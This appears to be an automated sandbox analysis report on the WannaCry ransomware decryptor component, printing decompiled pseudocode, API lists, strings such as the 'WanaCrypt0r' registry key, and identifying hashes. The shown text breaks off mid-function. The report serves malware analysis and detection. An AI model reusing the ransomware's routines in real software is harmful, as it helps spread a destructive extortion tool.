                                                      					_t86 = CreateSolidBrush( *(_t156 + 0x54));
                                                      					_v220 = _t86;
                                                      					FillRect(_v140,  &_v160, _t86);
                                                      					_t89 = 0;
                                                      					_v260 = 0;
                                                      					if(_t108 > 0) {
                                                      						do {
                                                      							_v224 =  *((intOrPtr*)( *((intOrPtr*)(_t156 + 0x44)) + _t89));
                                                      							E00405110(_t156,  &_v188, _v224);
                                                      							asm("sbb eax, eax");
                                                      							BitBlt(_v160, _t160, _v272,  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68)),  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c)),  ~( &_v260) & _v256, _v196, _v192, 0xcc0020);
                                                      							_t102 =  *((intOrPtr*)(_t156 + 0x74));
                                                      							_t160 = _t160 +  *((intOrPtr*)(_t156 + 0x60)) +  *((intOrPtr*)(_t156 + 0x68));
                                                      							_t153 = _t153 + 1;
                                                      							if(_t153 != _t102) {
                                                      								goto L10;
                                                      							} else {
                                                      								_t136 =  *((intOrPtr*)(_t156 + 0x70));
                                                      								if(_t136 != 1) {
                                                      									if(_t153 != _t102) {
                                                      										goto L10;
                                                      									} else {
                                                      										_t104 = _t136;
                                                      										if(_t104 <= 1) {
                                                      											goto L10;
                                                      										} else {
                                                      											if(_v304 != _t104) {
                                                      												_t153 = 0;
                                                      												_t160 = 0;
                                                      												_v300 = _v300 +  *((intOrPtr*)(_t156 + 0x64)) +  *((intOrPtr*)(_t156 + 0x6c));
                                                      												_v304 = _v304 + 1;
                                                      												goto L10;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L11;
                                                      							L10:
                                                      							_t89 = _v296 + 1;
                                                      							_v296 = _t89;
                                                      						} while (_t89 < _v272);
                                                      					}
                                                      					L11:
                                                      					_t90 = _v228;
                                                      					if(_t90 != 0) {
                                                      						_t90 =  *((intOrPtr*)(_t90 + 4));
                                                      					}
                                                      					_push(_t90);
                                                      					_push(_v248);
                                                      					L00412E48();
                                                      					L00412E42();
                                                      					DeleteObject(_v264);
                                                      					_t78 = DeleteObject(_v244);
                                                      					_v80 = 0;
                                                      					L00412E3C();
                                                      					_v80 = 0xffffffff;
                                                      					L00412DB8();
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t78;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785CreateDeleteObjectRect$#1168#1640#2405#2860#323#470#640#755BrushClientCompatibleFillSolid
                                                      • String ID:
                                                      • API String ID: 1233696098-0
                                                      • Opcode ID: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                                      • Instruction ID: b627e9c1237585dd637a27707791d59f98fdace04f8481d3914a5fbe5096edf5
                                                      • Opcode Fuzzy Hash: d2a394ca3572882bfb2f5d87bffa0f05435ffd103ecaeaaf491a49074e348053
                                                      • Instruction Fuzzy Hash: 057135716087419FC324DF69C984AABB7E9FB88704F004A2EF59AC3350DB74E845CB66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 318 401600-401614 319 4016e5-4016e7 318->319 320 40161a-40161b 318->320 321 401734-401737 319->321 322 4016e9-401731 #537 call 401970 SendMessageA #2385 319->322 323 40161d-40161e 320->323 324 40168f-401691 320->324 326 401743-401754 #2385 321->326 328 401739 321->328 323->326 327 401624-401626 323->327 329 401693-4016db #537 call 401970 SendMessageA #2385 324->329 330 4016de-4016e1 324->330 332 401628-40165b #537 call 401970 #2385 327->332 333 40165e-401661 327->333 328->326 330->326 335 4016e3 330->335 333->330 337 401663-40168c #537 call 401970 #2385 333->337 335->328
                                                      C-Code - Quality: 65%
                                                      			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
                                                      				void* _t19;
                                                      				long _t21;
                                                      				long _t24;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				intOrPtr _t27;
                                                      				long _t48;
                                                      				void* _t49;
                                                      				intOrPtr _t50;
                                                      
                                                      				_t27 = _a4;
                                                      				_t48 = _a8;
                                                      				_t19 = _t27 - 0x4e20;
                                                      				_t49 = __ecx;
                                                      				if(_t19 == 0) {
                                                      					if(_t48 != 0) {
                                                      						if(_t48 == 0xffffffff) {
                                                      							goto L14;
                                                      						}
                                                      						goto L15;
                                                      					} else {
                                                      						_push(__ecx);
                                                      						_a4 = _t50;
                                                      						L00412CAA();
                                                      						E00401970("Connected");
                                                      						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
                                                      						_push(_a4);
                                                      						_push(_t48);
                                                      						_push(_t27);
                                                      						 *(_t49 + 0xb0) = 0x23;
                                                      						L00412BAE();
                                                      						return _t21;
                                                      					}
                                                      				} else {
                                                      					_t19 = _t19 - 1;
                                                      					if(_t19 == 0) {
                                                      						if(_t48 != 0) {
                                                      							goto L9;
                                                      						} else {
                                                      							_push(__ecx);
                                                      							_a4 = _t50;
                                                      							L00412CAA();
                                                      							E00401970("Sent request");
                                                      							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
                                                      							_push(_a4);
                                                      							_push(_t48);
                                                      							_push(_t27);
                                                      							 *(_t49 + 0xb0) = 0x28;
                                                      							L00412BAE();
                                                      							return _t24;
                                                      						}
                                                      					} else {
                                                      						_t19 = _t19 - 1;
                                                      						if(_t19 != 0) {
                                                      							L15:
                                                      							_push(_a12);
                                                      							_push(_t48);
                                                      							_push(_t27); // executed
                                                      							L00412BAE(); // executed
                                                      							return _t19;
                                                      						} else {
                                                      							if(_t48 != 0) {
                                                      								if(_t48 != 1) {
                                                      									L9:
                                                      									if(_t48 == 0xffffffff) {
                                                      										L14:
                                                      										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
                                                      									}
                                                      									goto L15;
                                                      								} else {
                                                      									_push(__ecx);
                                                      									_a4 = _t50;
                                                      									L00412CAA();
                                                      									_t25 = E00401970("Succeed");
                                                      									_push(_a4);
                                                      									_push(_t48);
                                                      									_push(_t27);
                                                      									L00412BAE();
                                                      									return _t25;
                                                      								}
                                                      							} else {
                                                      								_push(__ecx);
                                                      								_a4 = _t50;
                                                      								L00412CAA();
                                                      								_t26 = E00401970("Received response");
                                                      								_push(_a4);
                                                      								_push(_t48);
                                                      								_push(_t27);
                                                      								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
                                                      								L00412BAE();
                                                      								return _t26;
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      • #2385.MFC42 ref: 00401653
                                                      • #537.MFC42(Received response), ref: 00401634
                                                        • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                                        • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                                        • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                                      • #537.MFC42(Succeed), ref: 0040166F
                                                      • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                                      • #537.MFC42(Sent request), ref: 0040169F
                                                      • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                                      • #2385.MFC42 ref: 004016D3
                                                      • #537.MFC42(Connected), ref: 004016F5
                                                      • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                                      • #2385.MFC42 ref: 00401729
                                                      • #2385.MFC42(?,?,?), ref: 0040174C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2385$#537$MessageSend$#3092#6199#800
                                                      • String ID: Connected$Received response$Sent request$Succeed
                                                      • API String ID: 3790904636-3692714192
                                                      • Opcode ID: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                                      • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                                      • Opcode Fuzzy Hash: 4248ce8c7a47d30574ec48fc369442f637571c250744fd81582f6567f40f10fe
                                                      • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 352 4063a0-4064b5 #2302 * 12 #2370 * 3
                                                      APIs
                                                      • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                                      • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                                      • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                                      • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                                      • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                                      • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                                      • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                                      • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                                      • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                                      • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                                      • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                                      • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                                      • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                                      • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                                      • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2302$#2370
                                                      • String ID:
                                                      • API String ID: 1711274145-0
                                                      • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                                      • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 353 406dc0-406dfa SendMessageA #823 354 406e00-406e08 353->354 355 406edf-406ee6 353->355 356 406e0a-406e0c 354->356 357 406e0e 354->357 358 406e11-406e29 SendMessageA 356->358 357->358 359 406ed2-406edc #825 358->359 360 406e2f-406e49 _strnicmp 358->360 359->355 361 406e67-406e6c 360->361 362 406e4b-406e65 _strnicmp 360->362 363 406ec9-406ecc 361->363 364 406e6e 361->364 362->361 362->363 363->359 363->360 365 406e72-406e76 364->365 366 406e78-406e7b 365->366 367 406e7f-406e85 365->367 366->365 368 406e7d 366->368 367->363 369 406e87-406ec4 SendMessageA #6136 367->369 368->363 369->363
                                                      C-Code - Quality: 64%
                                                      			E00406DC0(void* __ecx) {
                                                      				int _v76;
                                                      				int _v80;
                                                      				char _v84;
                                                      				int _v88;
                                                      				long _v92;
                                                      				void* _v96;
                                                      				int _v100;
                                                      				void* _v104;
                                                      				long _t28;
                                                      				void* _t29;
                                                      				struct HWND__* _t30;
                                                      				int _t32;
                                                      				void* _t35;
                                                      				int _t39;
                                                      				long _t47;
                                                      				int _t48;
                                                      				void* _t51;
                                                      
                                                      				_t35 = __ecx;
                                                      				_t48 = 0;
                                                      				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
                                                      				_t47 = _t28;
                                                      				_v96 = 0;
                                                      				_v92 = _t47;
                                                      				_t4 = _t47 + 1; // 0x1
                                                      				L00412CEC();
                                                      				_t51 =  &_v104 + 4;
                                                      				_v88 = _t28;
                                                      				if(_t28 == 0) {
                                                      					return _t28;
                                                      				}
                                                      				_t29 = _t35 + 0x4c0;
                                                      				if(_t29 != 0) {
                                                      					_t30 =  *(_t29 + 0x20);
                                                      				} else {
                                                      					_t30 = 0;
                                                      				}
                                                      				SendMessageA(_t30, 0x44b, _t48,  &_v96); // executed
                                                      				_t32 = _v88;
                                                      				 *((char*)(_t32 + _t47)) = 0;
                                                      				if(_t47 < 0) {
                                                      					L15:
                                                      					_push(_v88);
                                                      					L00412C98();
                                                      					return _t32;
                                                      				} else {
                                                      					do {
                                                      						__imp___strnicmp(_t48 + _v88, "<http://", 8);
                                                      						_t51 = _t51 + 0xc;
                                                      						if(_t32 == 0) {
                                                      							L7:
                                                      							_t48 = _t48 + 1;
                                                      							_t39 = _t48;
                                                      							if(_t48 > _t47) {
                                                      								goto L14;
                                                      							}
                                                      							_t32 = _v88;
                                                      							while( *((char*)(_t48 + _t32)) != 0x3e) {
                                                      								_t48 = _t48 + 1;
                                                      								if(_t48 <= _t47) {
                                                      									continue;
                                                      								}
                                                      								goto L14;
                                                      							}
                                                      							_t32 = _t48;
                                                      							_t48 = _t48 + 1;
                                                      							if(_t32 != 0xffffffff) {
                                                      								_v100 = _t32;
                                                      								_v104 = _t39;
                                                      								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
                                                      								_t32 = 0x20;
                                                      								_push( &_v84);
                                                      								_v84 = 0x54;
                                                      								_v76 = 0x20;
                                                      								_v80 = 0x20;
                                                      								L00412F4A();
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      						_t32 = _v88;
                                                      						__imp___strnicmp(_t48 + _t32, "<https://", 9);
                                                      						_t51 = _t51 + 0xc;
                                                      						if(_t32 != 0) {
                                                      							goto L14;
                                                      						}
                                                      						goto L7;
                                                      						L14:
                                                      						_t48 = _t48 + 1;
                                                      					} while (_t48 <= _t47);
                                                      					goto L15;
                                                      				}
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                                      • #823.MFC42(00000001,?,?), ref: 00406DEC
                                                      • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                                      • _strnicmp.MSVCRT ref: 00406E3E
                                                      • _strnicmp.MSVCRT ref: 00406E5A
                                                      • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                                      • #6136.MFC42 ref: 00406EC4
                                                      • #825.MFC42(?), ref: 00406ED7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$_strnicmp$#6136#823#825
                                                      • String ID: <http://$<https://$T
                                                      • API String ID: 1228111698-1216084165
                                                      • Opcode ID: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                                      • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                                      • Opcode Fuzzy Hash: cdce9b46107efdddb91857a97f1fff2144e6341c78577d605c9c0136cf899573
                                                      • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 370 401c70-401cd8 wcscat 371 401cdc-401cde 370->371 372 401ce0-401cef 371->372 373 401cf1-401cfb 371->373 374 401d00-401d0c RegCreateKeyW 372->374 373->374 375 401d12-401d1b 374->375 376 401dad-401db5 374->376 377 401d62-401d8e RegQueryValueExA 375->377 378 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 375->378 376->371 379 401dbb-401dc7 376->379 380 401d9e-401dab RegCloseKey 377->380 381 401d90-401d98 SetCurrentDirectoryA 377->381 378->380 380->376 382 401dc8-401dd7 380->382 381->380
                                                      C-Code - Quality: 84%
                                                      			E00401C70(signed int _a4) {
                                                      				void _v519;
                                                      				char _v520;
                                                      				void _v700;
                                                      				short _v720;
                                                      				int _v724;
                                                      				void* _v728;
                                                      				int _t30;
                                                      				void* _t36;
                                                      				signed int _t38;
                                                      				signed int _t46;
                                                      				signed int _t56;
                                                      				int _t72;
                                                      				void* _t77;
                                                      
                                                      				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
                                                      				_v520 = _t30;
                                                      				memset( &_v519, _t30, 0x81 << 2);
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				_v728 = 0;
                                                      				wcscat( &_v720, L"WanaCrypt0r");
                                                      				_t72 = 0;
                                                      				_v724 = 0;
                                                      				do {
                                                      					if(_t72 != 0) {
                                                      						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
                                                      					} else {
                                                      						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
                                                      					}
                                                      					_t36 = _v728;
                                                      					if(_t36 == 0) {
                                                      						goto L10;
                                                      					} else {
                                                      						_t56 = _a4;
                                                      						if(_t56 == 0) {
                                                      							_v724 = 0x207;
                                                      							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
                                                      							asm("sbb esi, esi");
                                                      							_t77 =  ~_t38 + 1;
                                                      							if(_t77 != 0) {
                                                      								SetCurrentDirectoryA( &_v520);
                                                      							}
                                                      						} else {
                                                      							GetCurrentDirectoryA(0x207,  &_v520);
                                                      							asm("repne scasb");
                                                      							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
                                                      							_t72 = _v724;
                                                      							asm("sbb esi, esi");
                                                      							_t77 =  ~_t46 + 1;
                                                      						}
                                                      						RegCloseKey(_v728); // executed
                                                      						if(_t77 != 0) {
                                                      							return 1;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      					}
                                                      					L13:
                                                      					L10:
                                                      					_t72 = _t72 + 1;
                                                      					_v724 = _t72;
                                                      				} while (_t72 < 2);
                                                      				return 0;
                                                      				goto L13;
                                                      			}

                                                      APIs
                                                      • wcscat.MSVCRT ref: 00401CC1
                                                      • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                      • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                      • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                      • RegQueryValueExA.KERNELBASE ref: 00401D81
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                                      • String ID: Software\$WanaCrypt0r
                                                      • API String ID: 3883271862-1723423467
                                                      • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                                      • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E0040BAF0() {
                                                      				signed int _t71;
                                                      				signed int _t72;
                                                      				void* _t84;
                                                      				signed int _t86;
                                                      				signed int _t91;
                                                      				signed int _t92;
                                                      				signed int _t97;
                                                      				intOrPtr _t101;
                                                      				signed int _t110;
                                                      				void* _t113;
                                                      				void* _t116;
                                                      				signed int _t126;
                                                      				char _t129;
                                                      				signed int _t131;
                                                      				unsigned int _t138;
                                                      				signed int _t139;
                                                      				char* _t144;
                                                      				signed int _t147;
                                                      				unsigned int _t152;
                                                      				signed int _t153;
                                                      				signed int _t158;
                                                      				signed int _t160;
                                                      				signed int _t161;
                                                      				signed int _t169;
                                                      				signed int _t172;
                                                      				signed int _t173;
                                                      				signed int _t181;
                                                      				signed int _t191;
                                                      				signed int _t198;
                                                      				signed int _t199;
                                                      				signed int _t200;
                                                      				void* _t237;
                                                      				char* _t238;
                                                      				void* _t240;
                                                      				void* _t241;
                                                      				intOrPtr* _t242;
                                                      				void* _t245;
                                                      				intOrPtr* _t246;
                                                      				signed int _t249;
                                                      				intOrPtr* _t250;
                                                      				intOrPtr _t251;
                                                      				void* _t252;
                                                      				void* _t255;
                                                      				void* _t256;
                                                      				void* _t257;
                                                      				void* _t259;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      				void* _t263;
                                                      				void* _t264;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00414286);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t251;
                                                      				_t252 = _t251 - 0x47c;
                                                      				_t71 = E0040BA10();
                                                      				if(_t71 != 0) {
                                                      					L31:
                                                      					_t72 = _t71 | 0xffffffff;
                                                      					__eflags = _t72;
                                                      				} else {
                                                      					_t131 =  *0x422210; // 0xb828e8
                                                      					 *((intOrPtr*)( *_t131 + 0xc))();
                                                      					asm("repne scasb");
                                                      					_t266 =  !(_t131 | 0xffffffff) == 1;
                                                      					if( !(_t131 | 0xffffffff) == 1) {
                                                      						L3:
                                                      						_t249 = 0;
                                                      						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
                                                      						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
                                                      						 *(_t252 + 0x1c) = 0;
                                                      						asm("repne scasb");
                                                      						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
                                                      						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
                                                      						 *((intOrPtr*)(_t252 + 0x498)) = 0;
                                                      						_t139 = _t138 >> 2;
                                                      						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
                                                      						_t255 = _t252 + 0x18;
                                                      						_t144 = _t255 + 0xa8;
                                                      						_t238 = strtok(_t144, ",;");
                                                      						_t256 = _t255 + 8;
                                                      						if(_t238 != 0) {
                                                      							_t129 =  *((intOrPtr*)(_t256 + 0x13));
                                                      							do {
                                                      								_t200 = _t249;
                                                      								_t249 = _t249 + 1;
                                                      								if(_t200 > 0) {
                                                      									_t181 = _t256 + 0x28;
                                                      									 *(_t256 + 0x28) = _t129;
                                                      									E0040C7B0(_t181, 0);
                                                      									asm("repne scasb");
                                                      									_push( !(_t181 | 0xffffffff) - 1);
                                                      									_push(_t238);
                                                      									E0040C920(_t256 + 0x2c);
                                                      									 *((char*)(_t256 + 0x4a0)) = 1;
                                                      									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
                                                      									_t144 = _t256 + 0x28;
                                                      									 *((char*)(_t256 + 0x498)) = 0;
                                                      									E0040C7B0(_t144, 1);
                                                      								}
                                                      								_t238 = strtok(0, ",;");
                                                      								_t256 = _t256 + 8;
                                                      							} while (_t238 != 0);
                                                      						}
                                                      						asm("repne scasb");
                                                      						_t147 =  !(_t144 | 0xffffffff) - 1;
                                                      						if(_t147 == 0) {
                                                      							L17:
                                                      							_push(_t256 + 0xa4);
                                                      							_t84 = E0040BA60(_t277);
                                                      							_t256 = _t256 + 4;
                                                      							if(_t84 != 0) {
                                                      								goto L19;
                                                      							} else {
                                                      								asm("repne scasb");
                                                      								_t172 =  !(_t147 | 0xffffffff);
                                                      								_t245 = _t256 + 0xa4 - _t172;
                                                      								_t173 = _t172 >> 2;
                                                      								memcpy(0x422214, _t245, _t173 << 2);
                                                      								_t263 = _t256 + 0xc;
                                                      								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
                                                      								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
                                                      								_t264 = _t263 + 0xc;
                                                      								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
                                                      								_push( *((intOrPtr*)(_t264 + 0x18)));
                                                      								L00412C98();
                                                      								_t252 = _t264 + 4;
                                                      								_t72 = 0;
                                                      							}
                                                      						} else {
                                                      							_t246 = _t256 + 0xa4;
                                                      							_t116 = 0x422214;
                                                      							while(1) {
                                                      								_t198 =  *_t116;
                                                      								_t147 = _t198;
                                                      								if(_t198 !=  *_t246) {
                                                      									break;
                                                      								}
                                                      								if(_t147 == 0) {
                                                      									L14:
                                                      									_t116 = 0;
                                                      								} else {
                                                      									_t24 = _t116 + 1; // 0x0
                                                      									_t199 =  *_t24;
                                                      									_t147 = _t199;
                                                      									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
                                                      										break;
                                                      									} else {
                                                      										_t116 = _t116 + 2;
                                                      										_t246 = _t246 + 2;
                                                      										if(_t147 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								}
                                                      								L16:
                                                      								_t277 = _t116;
                                                      								if(_t116 == 0) {
                                                      									L19:
                                                      									srand(GetTickCount());
                                                      									_t86 =  *(_t256 + 0x20);
                                                      									_t257 = _t256 + 4;
                                                      									__eflags = _t86;
                                                      									if(_t86 <= 0) {
